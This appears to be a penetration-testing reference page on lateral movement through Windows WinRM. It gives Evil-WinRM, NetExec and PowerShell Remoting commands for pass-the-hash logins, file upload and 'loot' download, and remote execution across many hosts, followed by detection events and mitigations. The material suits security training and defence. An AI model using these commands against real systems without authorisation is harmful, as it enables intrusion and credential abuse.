WinRM
Overview
Windows Remote Management (WinRM) is Microsoft's implementation of WS-Management for remote command execution. It runs on TCP 5985 (HTTP) and 5986 (HTTPS). WinRM provides PowerShell Remoting, which is the legitimate administration channel in modern Windows environments. For lateral movement, WinRM is attractive because it is a normal management protocol — traffic blends with legitimate admin activity.
ATT&CK Mapping
- Tactic: TA0008 - Lateral Movement
- Technique: T1021.006 - Remote Services: Windows Remote Management
Prerequisites
- Valid credentials with local admin rights (or membership in "Remote Management Users" group)
- WinRM enabled on the target (enabled by default on Windows Server, often on workstations in managed environments)
- Network access to TCP 5985 or 5986
Techniques
Evil-WinRM (from Linux)
# Evil-WinRM
# https://github.com/Hackplayers/evil-winrm
# Password authentication
evil-winrm -i <target> -u <user> -p <password>
# Pass-the-hash
evil-winrm -i <target> -u <user> -H '<NThash>'
# With SSL (port 5986)
evil-winrm -i <target> -u <user> -p <password> -S
# Upload/download files
# (from within evil-winrm session)
upload /local/path/file.exe C:\Users\Public\file.exe
download C:\Users\Public\loot.txt /local/path/loot.txt
# Load PowerShell scripts
evil-winrm -i <target> -u <user> -p <password> -s /local/scripts/
# Then call functions from the loaded scripts
NetExec WinRM
# NetExec
# https://github.com/Pennyw0rth/NetExec
# Check WinRM access
nxc winrm <target> -u <user> -p <password>
# (Pwn3d!) = can execute commands
# Execute command
nxc winrm <target> -u <user> -p <password> -x 'whoami'
# Execute PowerShell
nxc winrm <target> -u <user> -p <password> -X 'Get-Process'
# Pass-the-hash
nxc winrm <target> -u <user> -H '<NThash>' -x 'whoami'
# Multiple targets
nxc winrm targets.txt -u <user> -p <password> -x 'hostname'
PowerShell Remoting (from Windows)
# Enter interactive PSSession
Enter-PSSession -ComputerName <target> -Credential <domain>\<user>
# Execute command remotely
Invoke-Command -ComputerName <target> -Credential <domain>\<user> -ScriptBlock { whoami }
# Execute on multiple computers
Invoke-Command -ComputerName server1,server2,server3 -Credential <domain>\<user> -ScriptBlock { hostname }
# Execute a local script remotely
Invoke-Command -ComputerName <target> -Credential <domain>\<user> -FilePath C:\local\script.ps1
Detection Methods
Network-Based Detection
- WinRM traffic (TCP 5985/5986) between workstations (should normally only be admin to server)
- High frequency of WinRM connections from a single source
Host-Based Detection
- Event ID 4624 (Type 3) — network logon via WinRM
- Event ID 91 — WinRM session created
- PowerShell script block logging — reveals commands executed remotely
- Sysmon Event ID 1 — wsmprovhost.exe spawning child processes
Mitigation Strategies
- Restrict WinRM access — limit WinRM to management networks via Windows Firewall or GPO
- Use JEA (Just Enough Administration) — restrict what commands remote users can execute
- Enable PowerShell logging — script block logging and transcription capture all remote commands
- Limit Remote Management Users — only administrators or specifically authorized accounts should have WinRM access
- Use HTTPS (5986) — encrypt WinRM traffic to prevent credential interception